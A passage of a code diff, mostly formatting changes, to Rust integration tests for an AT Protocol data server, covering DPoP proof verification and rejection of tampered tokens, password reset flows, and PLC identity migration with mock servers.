body["error_description"].as_str().unwrap().contains("client_id"), 929 + body["error_description"] 930 + .as_str() 931 + .unwrap() 932 + .contains("client_id"), 807 933 "Error should mention client_id mismatch" 808 934 ); 809 935 } ··· 831 957 let verifier2 = DPoPVerifier::new(secret2); 832 958 let nonce_from_server1 = verifier1.generate_nonce(); 833 959 let result = verifier2.validate_nonce(&nonce_from_server1); 834 - assert!(result.is_err(), "Nonce from different server should be rejected"); 960 + assert!( 961 + result.is_err(), 962 + "Nonce from different server should be rejected" 963 + ); 835 964 } 836 965 837 966 #[test] 838 967 fn test_security_dpop_proof_signature_tampering() { 839 - use p256::ecdsa::{SigningKey, Signature, signature::Signer}; 968 + use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 840 969 use p256::elliptic_curve::sec1::ToEncodedPoint; 841 970 let secret = b"test-dpop-secret-32-bytes-long!!"; 842 971 let verifier = DPoPVerifier::new(secret); ··· 870 999 let tampered_sig = URL_SAFE_NO_PAD.encode(&sig_bytes); 871 1000 let tampered_proof = format!("{}.{}.{}", header_b64, payload_b64, tampered_sig); 872 1001 let result = verifier.verify_proof(&tampered_proof, "POST", "https://example.com/token", None); 873 - assert!(result.is_err(), "Tampered DPoP signature should be rejected"); 1002 + assert!( 1003 + result.is_err(), 1004 + "Tampered DPoP signature should be rejected" 1005 + ); 874 1006 } 875 1007 876 1008 #[test] 877 1009 fn test_security_dpop_proof_key_substitution() { 878 - use p256::ecdsa::{SigningKey, Signature, signature::Signer}; 1010 + use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 879 1011 use p256::elliptic_curve::sec1::ToEncodedPoint; 880 1012 let secret = b"test-dpop-secret-32-bytes-long!!"; 881 1013 let verifier = DPoPVerifier::new(secret); ··· 907 1039 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 908 1040 let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 909 1041 let mismatched_proof = format!("{}.{}.{}", header_b64, payload_b64, signature_b64); 910 - let result = verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None); 911 - assert!(result.is_err(), "DPoP proof with mismatched key should be rejected"); 1042 + let result = 1043 + verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None); 1044 + assert!( 1045 + result.is_err(), 1046 + "DPoP proof with mismatched key should be rejected" 1047 + ); 912 1048 } 913 1049 914 1050 #[test] ··· 925 1061 } 926 1062 let first = &results[0]; 927 1063 for (i, result) in results.iter().enumerate() { 928 - assert_eq!(first, result, "Thumbprint should be deterministic, but iteration {} differs", i); 1064 + assert_eq!( 1065 + first, result, 1066 + "Thumbprint should be deterministic, but iteration {} differs", 1067 + i 1068 + ); 929 1069 } 930 1070 } 931 1071 932 1072 #[test] 933 1073 fn test_security_dpop_iat_clock_skew_limits() { 934 - use p256::ecdsa::{SigningKey, Signature, signature::Signer}; 1074 + use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 935 1075 use p256::elliptic_curve::sec1::ToEncodedPoint; 936 1076 let secret = b"test-dpop-secret-32-bytes-long!!"; 937 1077 let verifier = DPoPVerifier::new(secret); ··· 974 1114 let proof = format!("{}.{}.{}", header_b64, payload_b64, signature_b64); 975 1115 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 976 1116 if should_fail { 977 - assert!(result.is_err(), "iat offset {} should be rejected", offset_secs); 1117 + assert!( 1118 + result.is_err(), 1119 + "iat offset {} should be rejected", 1120 + offset_secs 1121 + ); 978 1122 } else { 979 - assert!(result.is_ok(), "iat offset {} should be accepted", offset_secs); 1123 + assert!( 1124 + result.is_ok(), 1125 + "iat offset {} should be accepted", 1126 + offset_secs 1127 + ); 980 1128 } 981 1129 } 982 1130 } 983 1131 984 1132 #[test] 985 1133 fn test_security_dpop_method_case_insensitivity() { 986 - use p256::ecdsa::{SigningKey, Signature, signature::Signer}; 1134 + use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 987 1135 use p256::elliptic_curve::sec1::ToEncodedPoint; 988 1136 let secret = b"test-dpop-secret-32-bytes-long!!"; 989 1137 let verifier = DPoPVerifier::new(secret); ··· 1015 1163 let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 1016 1164 let proof = format!("{}.{}.{}", header_b64, payload_b64, signature_b64); 1017 1165 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 1018 - assert!(result.is_ok(), "HTTP method comparison should be case-insensitive"); 1166 + assert!( 1167 + result.is_ok(), 1168 + "HTTP method comparison should be case-insensitive" 1169 + ); 1019 1170 } 1020 1171 1021 1172 #[tokio::test] ··· 1055 1206 async fn test_security_token_with_wrong_typ_rejected() { 1056 1207 let url = base_url().await; 1057 1208 let http_client = client(); 1058 - let wrong_types = vec![ 1059 - "JWT", 1060 - "jwt", 1061 - "at+JWT", 1062 - "access_token", 1063 - "", 1064 - ]; 1209 + let wrong_types = vec!["JWT", "jwt", "at+JWT", "access_token", ""]; 1065 1210 for typ in wrong_types { 1066 1211 let header = json!({ 1067 1212 "alg": "HS256", ··· 1100 1245 let http_client = client(); 1101 1246 let tokens_missing_claims = vec![ 1102 1247 (json!({"iss": "x", "sub": "x", "aud": "x", "iat": 0}), "exp"), 1103 - (json!({"iss": "x", "sub": "x", "aud": "x", "exp": 9999999999i64}), "iat"), 1104 - (json!({"iss": "x", "aud": "x", "iat": 0, "exp": 9999999999i64}), "sub"), 1248 + ( 1249 + json!({"iss": "x", "sub": "x", "aud": "x", "exp": 9999999999i64}), 1250 + "iat", 1251 + ), 1252 + ( 1253 + json!({"iss": "x", "aud": "x", "iat": 0, "exp": 9999999999i64}), 1254 + "sub", 1255 + ), 1105 1256 ]; 1106 1257 for (payload, missing_claim) in tokens_missing_claims { 1107 1258 let header = json!({ ··· 1155 1306 res.status(), 1156 1307 StatusCode::UNAUTHORIZED, 1157 1308 "Malformed token '{}' should be rejected", 1158 - if token.len() > 50 { &token[..50] } else { token } 1309 + if token.len() > 50 { 1310 + &token[..50] 1311 + } else { 1312 + token 1313 + } 1159 1314 ); 1160 1315 } 1161 1316 } ··· 1181 1336 res.status(), 1182 1337 StatusCode::OK, 1183 1338 "Auth header '{}...' should be accepted (RFC 7235 case-insensitivity)", 1184 - if auth_header.len() > 30 { &auth_header[..30] } else { &auth_header } 1339 + if auth_header.len() > 30 { 1340 + &auth_header[..30] 1341 + } else { 1342 + &auth_header 1343 + } 1185 1344 ); 1186 1345 } 1187 1346 let invalid_formats = vec![ ··· 1201 1360 res.status(), 1202 1361 StatusCode::UNAUTHORIZED, 1203 1362 "Auth header '{}...' should be rejected", 1204 - if auth_header.len() > 30 { &auth_header[..30] } else { &auth_header } 1363 + if auth_header.len() > 30 { 1364 + &auth_header[..30] 1365 + } else { 1366 + &auth_header 1367 + } 1205 1368 ); 1206 1369 } 1207 1370 } ··· 1215 1378 .send() 1216 1379 .await 1217 1380 .unwrap(); 1218 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Missing auth header should return 401"); 1381 + assert_eq!( 1382 + res.status(), 1383 + StatusCode::UNAUTHORIZED, 1384 + "Missing auth header should return 401" 1385 + ); 1219 1386 } 1220 1387 1221 1388 #[tokio::test] ··· 1228 1395 .send() 1229 1396 .await 1230 1397 .unwrap(); 1231 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Empty auth header should return 401"); 1398 + assert_eq!( 1399 + res.status(), 1400 + StatusCode::UNAUTHORIZED, 1401 + "Empty auth header should return 401" 1402 + ); 1232 1403 } 1233 1404 1234 1405 #[tokio::test] ··· 1250 1421 .await 1251 1422 .unwrap(); 1252 1423 let introspect_body: Value = introspect_res.json().await.unwrap(); 1253 - assert_eq!(introspect_body["active"], false, "Revoked token should be inactive"); 1424 + assert_eq!( 1425 + introspect_body["active"], false, 1426 + "Revoked token should be inactive" 1427 + ); 1254 1428 } 1255 1429 1256 1430 #[tokio::test] ··· 1259 1433 let url = base_url().await; 1260 1434 let http_client = no_redirect_client(); 1261 1435 let ts = Utc::now().timestamp_nanos_opt().unwrap_or(0); 1262 - let unique_ip = format!("10.{}.{}.{}", (ts >> 16) & 0xFF, (ts >> 8) & 0xFF, ts & 0xFF); 1436 + let unique_ip = format!( 1437 + "10.{}.{}.{}", 1438 + (ts >> 16) & 0xFF, 1439 + (ts >> 8) & 0xFF, 1440 + ts & 0xFF 1441 + ); 1263 1442 let redirect_uri = "https://example.com/rate-limit-callback"; 1264 1443 let mock_client = setup_mock_client_metadata(redirect_uri).await; 1265 1444 let client_id = mock_client.uri(); ··· 1316 1495 ath: Option<&str>, 1317 1496 iat_offset_secs: i64, 1318 1497 ) -> String { 1319 - use p256::ecdsa::{SigningKey, Signature, signature::Signer}; 1498 + use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 1320 1499 let signing_key = SigningKey::random(&mut rand::thread_rng()); 1321 1500 let verifying_key = signing_key.verifying_key(); 1322 1501 let point = verifying_key.to_encoded_point(false); ··· 1404 1583 assert!(thumbprint.is_ok()); 1405 1584 let tp = thumbprint.unwrap(); 1406 1585 assert!(!tp.is_empty()); 1407 - assert!(tp.chars().all(|c| c.is_alphanumeric() || c == '-' || c == '_')); 1586 + assert!( 1587 + tp.chars() 1588 + .all(|c| c.is_alphanumeric() || c == '-' || c == '_') 1589 + ); 1408 1590 } 1409 1591 1410 1592 #[test] ··· 1604 1786 let secret = b"test-dpop-secret-32-bytes-long!!"; 1605 1787 let verifier = DPoPVerifier::new(secret); 1606 1788 let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0); 1607 - let result = verifier.verify_proof( 1608 - &proof, 1609 - "POST", 1610 - "https://example.com/token?foo=bar", 1611 - None, 1789 + let result = verifier.verify_proof(&proof, "POST", "https://example.com/token?foo=bar", None); 1790 + assert!( 1791 + result.is_ok(), 1792 + "Query params should be ignored: {:?}", 1793 + result 1612 1794 ); 1613 - assert!(result.is_ok(), "Query params should be ignored: {:?}", result); 1614 1795 }
+74 -20
tests/password_reset.rs
··· 1 1 mod common; 2 2 mod helpers; 3 + use helpers::verify_new_account; 3 4 use reqwest::StatusCode; 4 - use serde_json::{json, Value}; 5 + use serde_json::{Value, json}; 5 6 use sqlx::PgPool; 6 - use helpers::verify_new_account; 7 7 8 8 async fn get_pool() -> PgPool { 9 9 let conn_str = common::get_db_connection_string().await; ··· 27 27 "password": "oldpassword" 28 28 }); 29 29 let res = client 30 - .post(format!("{}/xrpc/com.atproto.server.createAccount", base_url)) 30 + .post(format!( 31 + "{}/xrpc/com.atproto.server.createAccount", 32 + base_url 33 + )) 31 34 .json(&payload) 32 35 .send() 33 36 .await 34 37 .expect("Failed to create account"); 35 38 assert_eq!(res.status(), StatusCode::OK); 36 39 let res = client 37 - .post(format!("{}/xrpc/com.atproto.server.requestPasswordReset", base_url)) 40 + .post(format!( 41 + "{}/xrpc/com.atproto.server.requestPasswordReset", 42 + base_url 43 + )) 38 44 .json(&json!({"email": email})) 39 45 .send() 40 46 .await ··· 59 65 let client = common::client(); 60 66 let base_url = common::base_url().await; 61 67 let res = client 62 - .post(format!("{}/xrpc/com.atproto.server.requestPasswordReset", base_url)) 68 + .post(format!( 69 + "{}/xrpc/com.atproto.server.requestPasswordReset", 70 + base_url 71 + )) 63 72 .json(&json!({"email": "nonexistent@example.com"})) 64 73 .send() 65 74 .await ··· 82 91 "password": old_password 83 92 }); 84 93 let res = client 85 - .post(format!("{}/xrpc/com.atproto.server.createAccount", base_url)) 94 + .post(format!( 95 + "{}/xrpc/com.atproto.server.createAccount", 96 + base_url 97 + )) 86 98 .json(&payload) 87 99 .send() 88 100 .await ··· 92 104 let did = body["did"].as_str().unwrap(); 93 105 let _ = verify_new_account(&client, did).await; 94 106 let res = client 95 - .post(format!("{}/xrpc/com.atproto.server.requestPasswordReset", base_url)) 107 + .post(format!( 108 + "{}/xrpc/com.atproto.server.requestPasswordReset", 109 + base_url 110 + )) 96 111 .json(&json!({"email": email})) 97 112 .send() 98 113 .await ··· 107 122 .expect("User not found"); 108 123 let token = user.password_reset_code.expect("No reset code"); 109 124 let res = client 110 - .post(format!("{}/xrpc/com.atproto.server.resetPassword", base_url)) 125 + .post(format!( 126 + "{}/xrpc/com.atproto.server.resetPassword", 127 + base_url 128 + )) 111 129 .json(&json!({ 112 130 "token": token, 113 131 "password": new_password ··· 126 144 assert!(user.password_reset_code.is_none()); 127 145 assert!(user.password_reset_code_expires_at.is_none()); 128 146 let res = client 129 - .post(format!("{}/xrpc/com.atproto.server.createSession", base_url)) 147 + .post(format!( 148 + "{}/xrpc/com.atproto.server.createSession", 149 + base_url 150 + )) 130 151 .json(&json!({ 131 152 "identifier": handle, 132 153 "password": new_password ··· 136 157 .expect("Failed to login"); 137 158 assert_eq!(res.status(), StatusCode::OK); 138 159 let res = client 139 - .post(format!("{}/xrpc/com.atproto.server.createSession", base_url)) 160 + .post(format!( 161 + "{}/xrpc/com.atproto.server.createSession", 162 + base_url 163 + )) 140 164 .json(&json!({ 141 165 "identifier": handle, 142 166 "password": old_password ··· 152 176 let client = common::client(); 153 177 let base_url = common::base_url().await; 154 178 let res = client 155 - .post(format!("{}/xrpc/com.atproto.server.resetPassword", base_url)) 179 + .post(format!( 180 + "{}/xrpc/com.atproto.server.resetPassword", 181 + base_url 182 + )) 156 183 .json(&json!({ 157 184 "token": "invalid-token", 158 185 "password": "newpassword" ··· 178 205 "password": "oldpassword" 179 206 }); 180 207 let res = client 181 - .post(format!("{}/xrpc/com.atproto.server.createAccount", base_url)) 208 + .post(format!( 209 + "{}/xrpc/com.atproto.server.createAccount", 210 + base_url 211 + )) 182 212 .json(&payload) 183 213 .send() 184 214 .await 185 215 .expect("Failed to create account"); 186 216 assert_eq!(res.status(), StatusCode::OK); 187 217 let res = client 188 - .post(format!("{}/xrpc/com.atproto.server.requestPasswordReset", base_url)) 218 + .post(format!( 219 + "{}/xrpc/com.atproto.server.requestPasswordReset", 220 + base_url 221 + )) 189 222 .json(&json!({"email": email})) 190 223 .send() 191 224 .await ··· 207 240 .await 208 241 .expect("Failed to expire token"); 209 242 let res = client 210 - .post(format!("{}/xrpc/com.atproto.server.resetPassword", base_url)) 243 + .post(format!( 244 + "{}/xrpc/com.atproto.server.resetPassword", 245 + base_url 246 + )) 211 247 .json(&json!({ 212 248 "token": token, 213 249 "password": "newpassword" ··· 233 269 "password": "oldpassword" 234 270 }); 235 271 let res = client 236 - .post(format!("{}/xrpc/com.atproto.server.createAccount", base_url)) 272 + .post(format!( 273 + "{}/xrpc/com.atproto.server.createAccount", 274 + base_url 275 + )) 237 276 .json(&payload) 238 277 .send() 239 278 .await ··· 250 289 .expect("Failed to get session"); 251 290 assert_eq!(res.status(), StatusCode::OK); 252 291 let res = client 253 - .post(format!("{}/xrpc/com.atproto.server.requestPasswordReset", base_url)) 292 + .post(format!( 293 + "{}/xrpc/com.atproto.server.requestPasswordReset", 294 + base_url 295 + )) 254 296 .json(&json!({"email": email})) 255 297 .send() 256 298 .await ··· 265 307 .expect("User not found"); 266 308 let token = user.password_reset_code.expect("No reset code"); 267 309 let res = client 268 - .post(format!("{}/xrpc/com.atproto.server.resetPassword", base_url)) 310 + .post(format!( 311 + "{}/xrpc/com.atproto.server.resetPassword", 312 + base_url 313 + )) 269 314 .json(&json!({ 270 315 "token": token, 271 316 "password": "newpassword123" ··· 288 333 let client = common::client(); 289 334 let base_url = common::base_url().await; 290 335 let res = client 291 - .post(format!("{}/xrpc/com.atproto.server.requestPasswordReset", base_url)) 336 + .post(format!( 337 + "{}/xrpc/com.atproto.server.requestPasswordReset", 338 + base_url 339 + )) 292 340 .json(&json!({"email": ""})) 293 341 .send() 294 342 .await ··· 311 359 "password": "oldpassword" 312 360 }); 313 361 let res = client 314 - .post(format!("{}/xrpc/com.atproto.server.createAccount", base_url)) 362 + .post(format!( 363 + "{}/xrpc/com.atproto.server.createAccount", 364 + base_url 365 + )) 315 366 .json(&payload) 316 367 .send() 317 368 .await ··· 330 381 .expect("Failed to count") 331 382 .unwrap_or(0); 332 383 let res = client 333 - .post(format!("{}/xrpc/com.atproto.server.requestPasswordReset", base_url)) 384 + .post(format!( 385 + "{}/xrpc/com.atproto.server.requestPasswordReset", 386 + base_url 387 + )) 334 388 .json(&json!({"email": email})) 335 389 .send() 336 390 .await
+111 -65
tests/plc_migration.rs
··· 2 2 use common::*; 3 3 use k256::ecdsa::SigningKey; 4 4 use reqwest::StatusCode; 5 - use serde_json::{json, Value}; 5 + use serde_json::{Value, json}; 6 6 use sqlx::PgPool; 7 7 use wiremock::matchers::{method, path}; 8 8 use wiremock::{Mock, MockServer, ResponseTemplate}; ··· 73 73 async fn get_user_handle(did: &str) -> Option<String> { 74 74 let db_url = get_db_connection_string().await; 75 75 let pool = PgPool::connect(&db_url).await.ok()?; 76 - sqlx::query_scalar!( 77 - r#"SELECT handle FROM users WHERE did = $1"#, 78 - did 79 - ) 80 - .fetch_optional(&pool) 81 - .await 82 - .ok()? 76 + sqlx::query_scalar!(r#"SELECT handle FROM users WHERE did = $1"#, did) 77 + .fetch_optional(&pool) 78 + .await 79 + .ok()? 83 80 } 84 81 85 82 fn create_mock_last_op( ··· 107 104 }) 108 105 } 109 106 110 - fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> Value { 107 + fn create_did_document( 108 + did: &str, 109 + handle: &str, 110 + signing_key: &SigningKey, 111 + pds_endpoint: &str, 112 + ) -> Value { 111 113 let multikey = get_multikey_from_signing_key(signing_key); 112 114 json!({ 113 115 "@context": [ ··· 174 176 async fn test_full_plc_operation_flow() { 175 177 let client = client(); 176 178 let (token, did) = create_account_and_login(&client).await; 177 - let key_bytes = get_user_signing_key(&did).await 179 + let key_bytes = get_user_signing_key(&did) 180 + .await 178 181 .expect("Failed to get user signing key"); 179 - let signing_key = SigningKey::from_slice(&key_bytes) 180 - .expect("Failed to create signing key"); 181 - let handle = get_user_handle(&did).await 182 + let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key"); 183 + let handle = get_user_handle(&did) 184 + .await 182 185 .expect("Failed to get user handle"); 183 186 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 184 187 let pds_endpoint = format!("https://{}", hostname); ··· 192 195 .await 193 196 .expect("Request failed"); 194 197 assert_eq!(request_res.status(), StatusCode::OK); 195 - let plc_token = get_plc_token_from_db(&did).await 198 + let plc_token = get_plc_token_from_db(&did) 199 + .await 196 200 .expect("PLC token not found in database"); 197 201 let mock_plc = setup_mock_plc_for_sign(&did, &handle, &signing_key, &pds_endpoint).await; 198 202 unsafe { ··· 218 222 "Sign PLC operation should succeed. Response: {:?}", 219 223 sign_body 220 224 ); 221 - let operation = sign_body.get("operation") 225 + let operation = sign_body 226 + .get("operation") 222 227 .expect("Response should contain operation"); 223 228 assert!(operation.get("sig").is_some(), "Operation should be signed"); 224 - assert_eq!(operation.get("type").and_then(|v| v.as_str()), Some("plc_operation")); 225 - assert!(operation.get("prev").is_some(), "Operation should have prev reference"); 229 + assert_eq!( 230 + operation.get("type").and_then(|v| v.as_str()), 231 + Some("plc_operation") 232 + ); 233 + assert!( 234 + operation.get("prev").is_some(), 235 + "Operation should have prev reference" 236 + ); 226 237 } 227 238 228 239 #[tokio::test] ··· 230 241 async fn test_sign_plc_operation_consumes_token() { 231 242 let client = client(); 232 243 let (token, did) = create_account_and_login(&client).await; 233 - let key_bytes = get_user_signing_key(&did).await 244 + let key_bytes = get_user_signing_key(&did) 245 + .await 234 246 .expect("Failed to get user signing key"); 235 - let signing_key = SigningKey::from_slice(&key_bytes) 236 - .expect("Failed to create signing key"); 237 - let handle = get_user_handle(&did).await 247 + let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key"); 248 + let handle = get_user_handle(&did) 249 + .await 238 250 .expect("Failed to get user handle"); 239 251 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 240 252 let pds_endpoint = format!("https://{}", hostname); ··· 248 260 .await 249 261 .expect("Request failed"); 250 262 assert_eq!(request_res.status(), StatusCode::OK); 251 - let plc_token = get_plc_token_from_db(&did).await 263 + let plc_token = get_plc_token_from_db(&did) 264 + .await 252 265 .expect("PLC token not found in database"); 253 266 let mock_plc = setup_mock_plc_for_sign(&did, &handle, &signing_key, &pds_endpoint).await; 254 267 unsafe { ··· 292 305 } 293 306 294 307 #[tokio::test] 308 + #[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_with_custom_fields -- --ignored --test-threads=1"] 295 309 async fn test_sign_plc_operation_with_custom_fields() { 296 310 let client = client(); 297 311 let (token, did) = create_account_and_login(&client).await; 298 - let key_bytes = get_user_signing_key(&did).await 312 + let key_bytes = get_user_signing_key(&did) 313 + .await 299 314 .expect("Failed to get user signing key"); 300 - let signing_key = SigningKey::from_slice(&key_bytes) 301 - .expect("Failed to create signing key"); 302 - let handle = get_user_handle(&did).await 315 + let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key"); 316 + let handle = get_user_handle(&did) 317 + .await 303 318 .expect("Failed to get user handle"); 304 319 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 305 320 let pds_endpoint = format!("https://{}", hostname); ··· 313 328 .await 314 329 .expect("Request failed"); 315 330 assert_eq!(request_res.status(), StatusCode::OK); 316 - let plc_token = get_plc_token_from_db(&did).await 331 + let plc_token = get_plc_token_from_db(&did) 332 + .await 317 333 .expect("PLC token not found in database"); 318 334 let mock_plc = setup_mock_plc_for_sign(&did, &handle, &signing_key, &pds_endpoint).await; 319 335 unsafe { ··· 348 364 assert!(also_known_as.is_some(), "Should have alsoKnownAs"); 349 365 assert!(rotation_keys.is_some(), "Should have rotationKeys"); 350 366 assert_eq!(also_known_as.unwrap().len(), 2, "Should have 2 aliases"); 351 - assert_eq!(rotation_keys.unwrap().len(), 2, "Should have 2 rotation keys"); 367 + assert_eq!( 368 + rotation_keys.unwrap().len(), 369 + 2, 370 + "Should have 2 rotation keys" 371 + ); 352 372 } 353 373 354 374 #[tokio::test] ··· 356 376 async fn test_submit_plc_operation_success() { 357 377 let client = client(); 358 378 let (token, did) = create_account_and_login(&client).await; 359 - let key_bytes = get_user_signing_key(&did).await 379 + let key_bytes = get_user_signing_key(&did) 380 + .await 360 381 .expect("Failed to get user signing key"); 361 - let signing_key = SigningKey::from_slice(&key_bytes) 362 - .expect("Failed to create signing key"); 363 - let handle = get_user_handle(&did).await 382 + let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key"); 383 + let handle = get_user_handle(&did) 384 + .await 364 385 .expect("Failed to get user handle"); 365 386 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 366 387 let pds_endpoint = format!("https://{}", hostname); ··· 409 430 async fn test_submit_plc_operation_wrong_endpoint_rejected() { 410 431 let client = client(); 411 432 let (token, did) = create_account_and_login(&client).await; 412 - let key_bytes = get_user_signing_key(&did).await 433 + let key_bytes = get_user_signing_key(&did) 434 + .await 413 435 .expect("Failed to get user signing key"); 414 - let signing_key = SigningKey::from_slice(&key_bytes) 415 - .expect("Failed to create signing key"); 416 - let handle = get_user_handle(&did).await 436 + let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key"); 437 + let handle = get_user_handle(&did) 438 + .await 417 439 .expect("Failed to get user handle"); 418 440 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 419 441 let pds_endpoint = format!("https://{}", hostname); ··· 461 483 async fn test_submit_plc_operation_wrong_signing_key_rejected() { 462 484 let client = client(); 463 485 let (token, did) = create_account_and_login(&client).await; 464 - let key_bytes = get_user_signing_key(&did).await 486 + let key_bytes = get_user_signing_key(&did) 487 + .await 465 488 .expect("Failed to get user signing key"); 466 - let signing_key = SigningKey::from_slice(&key_bytes) 467 - .expect("Failed to create signing key"); 468 - let handle = get_user_handle(&did).await 489 + let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key"); 490 + let handle = get_user_handle(&did) 491 + .await 469 492 .expect("Failed to get user handle"); 470 493 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 471 494 let pds_endpoint = format!("https://{}", hostname); ··· 515 538 async fn test_full_sign_and_submit_flow() { 516 539 let client = client(); 517 540 let (token, did) = create_account_and_login(&client).await; 518 - let key_bytes = get_user_signing_key(&did).await 541 + let key_bytes = get_user_signing_key(&did) 542 + .await 519 543 .expect("Failed to get user signing key"); 520 - let signing_key = SigningKey::from_slice(&key_bytes) 521 - .expect("Failed to create signing key"); 522 - let handle = get_user_handle(&did).await 544 + let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key"); 545 + let handle = get_user_handle(&did) 546 + .await 523 547 .expect("Failed to get user handle"); 524 548 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 525 549 let pds_endpoint = format!("https://{}", hostname); ··· 533 557 .await 534 558 .expect("Request failed"); 535 559 assert_eq!(request_res.status(), StatusCode::OK); 536 - let plc_token = get_plc_token_from_db(&did).await 560 + let plc_token = get_plc_token_from_db(&did) 561 + .await 537 562 .expect("PLC token not found"); 538 563 let mock_server = MockServer::start().await; 539 564 let did_encoded = urlencoding::encode(&did); ··· 586 611 .expect("Sign failed"); 587 612 assert_eq!(sign_res.status(), StatusCode::OK); 588 613 let sign_body: Value = sign_res.json().await.unwrap(); 589 - let signed_operation = sign_body.get("operation") 614 + let signed_operation = sign_body 615 + .get("operation") 590 616 .expect("Response should contain operation") 591 617 .clone(); 592 618 assert!(signed_operation.get("sig").is_some()); ··· 612 638 } 613 639 614 640 #[tokio::test] 641 + #[ignore = "requires exclusive env var access; run with: cargo test test_cross_pds_migration_with_records -- --ignored --test-threads=1"] 615 642 async fn test_cross_pds_migration_with_records() { 616 643 let client = client(); 617 644 let (token, did) = create_account_and_login(&client).await; 618 - let key_bytes = get_user_signing_key(&did).await 645 + let key_bytes = get_user_signing_key(&did) 646 + .await 619 647 .expect("Failed to get user signing key"); 620 - let signing_key = SigningKey::from_slice(&key_bytes) 621 - .expect("Failed to create signing key"); 622 - let handle = get_user_handle(&did).await 648 + let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key"); 649 + let handle = get_user_handle(&did) 650 + .await 623 651 .expect("Failed to get user handle"); 624 652 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 625 653 let pds_endpoint = format!("https://{}", hostname); ··· 656 684 .expect("Export failed"); 657 685 assert_eq!(export_res.status(), StatusCode::OK); 658 686 let car_bytes = export_res.bytes().await.unwrap(); 659 - assert!(car_bytes.len() > 100, "CAR file should have meaningful content"); 687 + assert!( 688 + car_bytes.len() > 100, 689 + "CAR file should have meaningful content" 690 + ); 660 691 let mock_server = MockServer::start().await; 661 692 let did_encoded = urlencoding::encode(&did); 662 693 let did_doc = create_did_document(&did, &handle, &signing_key, &pds_endpoint); ··· 670 701 std::env::remove_var("SKIP_IMPORT_VERIFICATION"); 671 702 } 672 703 let import_res = client 673 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 704 + .post(format!( 705 + "{}/xrpc/com.atproto.repo.importRepo", 706 + base_url().await 707 + )) 674 708 .bearer_auth(&token) 675 709 .header("Content-Type", "application/vnd.ipld.car") 676 710 .body(car_bytes.to_vec()) ··· 705 739 ); 706 740 let record_body: Value = get_record_res.json().await.unwrap(); 707 741 assert_eq!( 708 - record_body["value"]["text"], 709 - "Test post before migration", 742 + record_body["value"]["text"], "Test post before migration", 710 743 "Record content should match" 711 744 ); 712 745 } ··· 716 749 let client = client(); 717 750 let (token, did) = create_account_and_login(&client).await; 718 751 let wrong_signing_key = SigningKey::random(&mut rand::thread_rng()); 719 - let handle = get_user_handle(&did).await 752 + let handle = get_user_handle(&did) 753 + .await 720 754 .expect("Failed to get user handle"); 721 755 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 722 756 let pds_endpoint = format!("https://{}", hostname); ··· 744 778 std::env::remove_var("SKIP_IMPORT_VERIFICATION"); 745 779 } 746 780 let import_res = client 747 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 781 + .post(format!( 782 + "{}/xrpc/com.atproto.repo.importRepo", 783 + base_url().await 784 + )) 748 785 .bearer_auth(&token) 749 786 .header("Content-Type", "application/vnd.ipld.car") 750 787 .body(car_bytes.to_vec()) ··· 763 800 import_body 764 801 ); 765 802 assert!( 766 - import_body["error"] == "InvalidSignature" || 767 - import_body["message"].as_str().unwrap_or("").contains("signature"), 803 + import_body["error"] == "InvalidSignature" 804 + || import_body["message"] 805 + .as_str() 806 + .unwrap_or("") 807 + .contains("signature"), 768 808 "Error should mention signature verification failure" 769 809 ); 770 810 } ··· 774 814 async fn test_full_migration_flow_end_to_end() { 775 815 let client = client(); 776 816 let (token, did) = create_account_and_login(&client).await; 777 - let key_bytes = get_user_signing_key(&did).await 817 + let key_bytes = get_user_signing_key(&did) 818 + .await 778 819 .expect("Failed to get user signing key"); 779 - let signing_key = SigningKey::from_slice(&key_bytes) 780 - .expect("Failed to create signing key"); 781 - let handle = get_user_handle(&did).await 820 + let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key"); 821 + let handle = get_user_handle(&did) 822 + .await 782 823 .expect("Failed to get user handle"); 783 824 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 784 825 let pds_endpoint = format!("https://{}", hostname); ··· 815 856 .await 816 857 .expect("Request failed"); 817 858 assert_eq!(request_res.status(), StatusCode::OK); 818 - let plc_token = get_plc_token_from_db(&did).await 859 + let plc_token = 